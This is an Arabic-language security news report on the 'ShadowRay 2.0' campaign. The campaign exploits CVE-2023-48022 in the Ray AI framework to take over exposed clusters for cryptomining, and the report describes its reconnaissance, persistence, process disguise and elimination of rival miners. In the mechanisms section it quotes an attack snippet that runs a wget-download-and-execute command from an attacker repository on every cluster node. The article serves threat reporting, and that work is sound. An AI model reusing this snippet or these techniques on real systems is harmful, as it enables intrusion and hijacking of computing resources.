كشف باحثون في مجال الأمن السيبراني عن حملة قرصنة عالمية نشطة تستغل ثغرة معروفة في إطار عمل Ray، وهو إطار عمل مفتوح المصدر للذكاء الاصطناعي يستخدم على نطاق واسع لإدارة مهام الحوسبة الموزعة. حملة “ShadowRay 2.0” الجديدة تستهدف البنية التحتية للذكاء الاصطناعي، مستفيدة من نقاط ضعف لم يتم إصلاحها.
تستغل هذه الهجمات الثغرة الأمنية CVE-2023-48022 للسيطرة بصمت على مجموعات الحوسبة الخاصة بالذكاء الاصطناعي وتحويلها إلى عمليات لتعدين العملات المشفرة. يمثل هذا التصعيد الكبير للهجمات التي تم اكتشافها لأول مرة في مارس 2024، حيث يستخدم المهاجمون تكتيكات متطورة للبقاء مخفيين.
حدد باحثو Oligo Security حملة الهجوم في أوائل نوفمبر 2025، واكتشفوا أن جهات التهديد التي تستخدم اسم IronErn440 قد قامت بتسليح ميزات التنسيق الشرعية لإطار Ray كأدوات لهجمات ذاتية الانتشار. تجعل الطبيعة العالمية لـ هجمات Ray هذه الثغرة خطيرة بشكل خاص.
ما يجعل هذا التهديد مقلقًا بشكل خاص هو حجم التعرض الهائل. لقد نمت أعداد خوادم Ray المكشوفة عالميًا من الآلاف خلال الاكتشاف الأصلي إلى أكثر من 230,000 مثيل حاليًا. يمتلك العديد من هذه الخوادم شركات ناشئة نشطة، ومختبرات بحثية، ومزودي استضافة سحابية، مما يخلق سطح هجوم واسع.
تطور تهديدات ShadowRay 2.0 واستهداف البنية التحتية للذكاء الاصطناعي
تمكن محللو أمن Oligo Security من تحديد حملة الهجوم بعد ملاحظة البرامج الضارة حساسة للمنطقة يتم توزيعها عبر GitLab. استغل المهاجمون في البداية منصة DevOps لتوصيل حمولات مخصصة تم تكييفها مع الموقع الجغرافي لكل ضحية.
بعد أن قامت GitLab بإزالة المستودع الخبيث في 5 نوفمبر 2025، قامت جهات التهديد بسرعة بترحيل عمليتها إلى GitHub، مما يدل على رشاقة تشغيلية ملحوظة. بحلول 10 نوفمبر، كانوا قد أسسوا مستودعًا جديدًا وواصلوا حملتهم بمزيد من التعقيد.
تتكون الهجمات من مراحل متعددة ومنسقة، تبدأ بالاستطلاع باستخدام interact.sh، وهي منصة خارج النطاق تسمح للمهاجمين بتحديد الخوادم الضعيفة دون مسح تقليدي صاخب. يرسل المهاجمون استفسارات تستهدف واجهة برمجة تطبيقات Jobs غير المحمية في Ray، مما يؤدي إلى ردود من المثيلات الضعيفة. بمجرد تحديد الأهداف، فإنهم يستغلون لوحة تحكم Ray غير المصادق عليها لتقديم وظائف ضارة تنفذ تعليمات برمجية عشوائية بصلاحيات المجموعة.
أبرز ما في الأمر هو استخدام حمولات تم إنشاؤها بواسطة الذكاء الاصطناعي. ينشر المهاجمون تعليمات برمجية مكتوبة بلغة Python تكتشف تلقائيًا موارد المجموعة المتاحة، وتحسب تخصيصًا بنسبة 60 بالمائة لوحدة المعالجة المركزية ووحدة معالجة الرسومات لتجنب الاكتشاف الفوري، ثم تحقن برامج التعدين المشفرة متنكرة في شكل عمليات نظام شرعية. تظهر الحمولات معالجة متطورة للأخطاء والتكيف الذاتي، مما يشير إلى أنها تم إنشاؤها أو تنقيحها باستخدام أدوات الذكاء الاصطناعي لتسريع تطوير الحمولات.
آليات الهجوم والصمود
يوضح مقتطف الكود الحاسم آلية الإصابة متعددة المراحل. تستخدم حمولة الوصول الأولية استراتيجية NodeAffinitySchedulingStrategy في Ray لتعداد عقد المجموعة ونشر نصوص الإصابة في كل واحدة منها.
nodes=[n for n in ray.nodes() if n.get('Alive', False)]
cmd='wget -qO- https://gitlab.com/ironern440-group/ironern440-project/-/raw/main/aa_clean.sh && chmod +x aa_clean.sh && ./aa_clean.sh'
[ray.get(ray.remote(lambda:subprocess.run(cmd,shell=True)).options(scheduling_strategy=NodeAffinitySchedulingStrategy...يقوم المهاجمون بإنشاء بقاء عبر آليات متعددة: مهام cron تعمل كل خمسة عشر دقيقة، واختطاف خدمات systemd، وحقن مفاتيح SSH في حسابات الجذر. يقومون بإخفاء العمليات الخبيثة عن طريق إعادة تسميتها لتبدو كعمال نواة شرعيين مثل [kworker/0:0] وخدمات dns-filter، مما يختفي بشكل فعال في العلن.
ما يميز هذه الحملة هو ديناميكيات المنافسة النشطة. ينشر المهاجمون نصوصًا للكشف عن برامج التعدين المنافسة وإنهاءها، ثم يحظرون مجمعات التعدين المنافسة من خلال قواعد iptables وتعديلات ملف المضيف. حتى أنهم يستهدفون المجمعات على منافذ محددة تستخدمها جهات التهديد المنافسة، مما يكشف عن نظام بيئي سفلي حيث تتنافس مجموعات إجرامية متعددة للحصول على نفس الموارد المخترقة.
يعد التكيف مع البنية التحتية مقلقًا بنفس القدر. بالنسبة لحالات الضحايا في الصين، يقوم المهاجمون بتوصيل حمولات خاصة بالمنطقة عبر خدمات وكيل لتجاوز قيود الشبكة. يستخدمون الكشف الجغرافي عبر ip-api.com، وينفذون نصوصًا مختلفة لأهداف صينية مقابل أهداف دولية. يقوم المهاجمون بتحديث حمولاتهم باستمرار من خلال التزامات GitLab، ويعاملون البنية التحتية كتعليمات برمجية، مما يتيح التطور في الوقت الفعلي لتقنياتهم دون إعادة النشر إلى أجهزة الضحايا.